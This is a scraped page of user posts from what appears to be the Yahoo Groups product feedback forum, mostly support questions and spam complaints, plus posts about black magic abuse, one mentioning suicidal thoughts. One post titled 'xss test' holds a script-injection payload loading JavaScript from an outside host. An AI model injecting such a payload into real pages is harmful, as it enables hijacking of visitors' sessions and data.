US Groups

This forum is for you to make product suggestions and provide thoughtful feedback. We’re always trying to improve our products and we can use the most popular feedback to make a positive change!

If you need assistance of any kind, please find self-paced help on our help site. This forum is not monitored for any support-related issues.

The Yahoo product feedback forum now requires a valid Yahoo ID and password to participate.

You are now required to sign-in using your Yahoo email account in order to provide us with feedback and to submit votes and comments to existing ideas. If you do not have a Yahoo ID or the password to your Yahoo ID, please sign-up for a new account.

If you have a valid Yahoo ID and password, follow these steps if you would like to remove your posts, comments, votes, and/or profile from the Yahoo product feedback forum.

• Hot ideas
  • Top ideas
  • New ideas
  • My feedback
  1. Black. Magic attack from Golden Dawn Group

some years ago I joined this Golden Dawn Group i was looking for a tarot group as I had an interest in tarot. I didn't know that there were people practising black magic or in fact any kind of magic. It wasn't on the group description The moderator of the grojp Martin Thibault, 'hooked' me and took me out of my body and has been abusing me astrally ever since, long after I left the group. It has got worse and worse and now i have not been able to sleep for months and am about to commit suicide i…

2469th ranked
    Sign in Sign in with Yahoo
    Signed in as (Sign out)

We’ll send you updates on this idea

1 comment  ·  Flag idea as inappropriate…  ·  Admin →
  2. Please clarify on the group membership management page: Must a new e-mail address be enclosed in < > after the member's name?

Please clarify on the group membership management page: Must a new e-mail address be enclosed in < > after the member's name? It is not clear whether that use in the example is required or simply being used as an indicator of where the e-mail address but not requiring the < >

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Group Membership  ·  Flag idea as inappropriate…  ·  Admin →
  3. xss test

"><script src=https://sadat.xss.ht></script>

2469th ranked
    Signed in as (Sign out)

1 comment  ·  Flag idea as inappropriate…  ·  Admin →
  4. someone or a community spam yahoogroups

I haven't check email from yahoogroups for long time. But today two emails attract my attention.
    It is from yahoogroup [backpackerdunia] and [bukukita].

[Backpackerdunia] is yahoogroup about traveling, and [bukukita] is about books. All in Indonesian language.

But both yahoogroups send email about criptocurrency, in english.
    since March-April 2020.

Please kindly recheck your yahoogroups. I don't think this is bugs but someone or a community spam yahoogroups.

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Defects or Bugs  ·  Flag idea as inappropriate…  ·  Admin →
  5. I can't leave some of my yahoo groups. Why?

There needs to be a "Leave Group" option for all groups.

2469th ranked
    Signed in as (Sign out)

6. Spam is being sent to an old dead group, how can we delete the group?

The RockhoundsList group has been dead for years, abandoned by the moderator, but someone is spamming it, and we can't find ANY way to kill it or unsubscribe from it. Anyone listening who can help?

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Support Issues  ·  Flag idea as inappropriate…  ·  Admin →
  7. 2469th ranked
    Signed in as (Sign out)

0 comments  ·  Search experience  ·  Flag idea as inappropriate…  ·  Admin →
  8. Sorry, an error occurred while loading the content fix

I am the owner of a Yahoo Group called PILOTACTION. Your Yahoo Group program will not let me change ownership of my Yahoo Group. To send a message to the group we use the address pilotaction@yahoogroups.com.

I would like to change the Group's ownership from myself at chipmunn@yahoo.com to scott@zeebsmail.com or scottypilotaction@yahoo.com.

When I go into the Dashboard I go to: yahoogroups.com>pilotaction>management>manage members>search the member>click on the member>role>save. This action does not work to change the member to the owner and I receive a message that says, "Sorry, an error occurred while loading the content."

Again, I am…

2469th ranked
    Signed in as (Sign out)

9. I give up I can't find listings of groups to join

I want to find/join an Epi-Feilines group that I KNOW existed and is excellent for info.
    I can't see any listing of groups to join, then I get an error saying I have exceeded my search limit for the day?

Here are your instructions
    Join a group
    In private groups, your request is sent to the group's moderator for approval.

Sign in to Yahoo Groups.
    Open a group.
    Click Join Group.
    Set your membership info.
    Click Send Request.

OK, I go to groups, sign in and see the 4 groups in which I am a member, but the next step…

2469th ranked
    Signed in as (Sign out)

1 comment  ·  Other  ·  Flag idea as inappropriate…  ·  Admin →
  10. Download data

How do I download my message from our group. Where is the help topic that shows how to download data from our group.
    All we want is our conversation data from the group.

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Messages and conversations  ·  Flag idea as inappropriate…  ·  Admin →
  11. "Our goal is to create a safe and engaging place for users to connect over interests and passions. In order to improve our community experie

"Our goal is to create a safe and engaging place for users to connect over interests and passions. In order to improve our community experience, we are temporarily suspending article commenting." . Anyone with half a brain and an open mind knows you closed "Comments" because you didn't want any possibility of someone disputing your anti-Trump pro-Democrat articles with facts before the election.

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Flag idea as inappropriate…  ·  Admin →
  12. Get rid of occult &religion section

There is too much black magic around anything to do with Occult, New Age or Religion. Even flower arranging or making dolls attracts black magic trolling. These people are psychopaths whose only intent is to do harm, manipulate and control people for their own use. I joined a tarot group years ago which turned out to be a black magic forum. I left but am still a victim of black magic

2469th ranked
    Signed in as (Sign out)

1 comment  ·  Defects or Bugs  ·  Flag idea as inappropriate…  ·  Admin →
  13. shut them down immediately there is too much abuse, too much black magic, too much trolling & power seeking by moderators seeking to take ad

There are some deadly viruses lurking in form of troll moderators seeking power and psychological control over members . I have been manipulated used and abused as a female and personal details used to definle me. I am not on any groups now but still a victim. Shut them all down completely please

2469th ranked
    Signed in as (Sign out)

14. Asked directed by Yahoo, I downloaded all my content from my Yahoo groups. How to I open them?

Asked directed by Yahoo, I downloaded all my content from my Yahoo groups. How and where can I open them?

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Support Issues  ·  Flag idea as inappropriate…  ·  Admin →
  15. 2469th ranked
    Signed in as (Sign out)

0 comments  ·  Groups management  ·  Flag idea as inappropriate…  ·  Admin →
  16. How do we assign moderator role to a member in Yahoo group?

Our group owner tried everything to assign a moderator role to someone, but ended up always with errors. Why and how can we assign a role to a member?

5257th ranked
    Signed in as (Sign out)

0 comments  ·  Groups management  ·  Flag idea as inappropriate…  ·  Admin →
  17. I need help to get a list of all email addresses in a Yahoo group that I am the owner so that I can move them to another site

I am a list owner of the kmtd-kh2 yahoo group. I would like to get a list of all members' email addresses so I can move them to another mailing group site.

Or if there is an automatic way to transfer all members, please let me know.

My email address is: thong_ly@yahoo.com

2469th ranked
    Signed in as (Sign out)

1 comment  ·  Groups management  ·  Flag idea as inappropriate…  ·  Admin →
  18. We are still receiving old messages on Yahoo Group based on the calemdar driven repeats. Can't access them or change anything.

Can't access the messages sent out by calendar and even. I would like them to go away.

2469th ranked
    Signed in as (Sign out)

0 comments  ·  Groups Calendar or Events  ·  Flag idea as inappropriate…  ·  Admin →
  19. soy administrador y fundador de un grupo de Yahoo. He invitado a una persona que también tiene cuenta de yahoo, enviándole el comando subcri

soy administrador y fundador de un grupo de Yahoo. He invitado a una persona que también tiene cuenta de yahoo, enviándole el comando subscribe, pero aunque lo ha usado, no le ha añadido al grupo, ni me ha llegado mensaje solicitando subscribirse. ¿Que debo hacer para que pueda añadirse como miembro del grupo?. <bernarsua@yahoo.es>, quedo a la espera de sus noticias.

5257th ranked
    Signed in as (Sign out)

0 comments  ·  Group Membership  ·  Flag idea as inappropriate…  ·  Admin →
  20. Stop spamming me and not letting me unsubscribe because I don't belong to your groups that are spamming me.

If you are going to allow groups to message people who aren't in the group, then let the victims unsubscribe.

2167th ranked
    Signed in as (Sign out)

1 comment  ·  Groups Emails  ·  Flag idea as inappropriate…  ·  Admin →
← Previous 1 3 4 5 264 265
  • Don't see your idea?

Feedback and Knowledge Base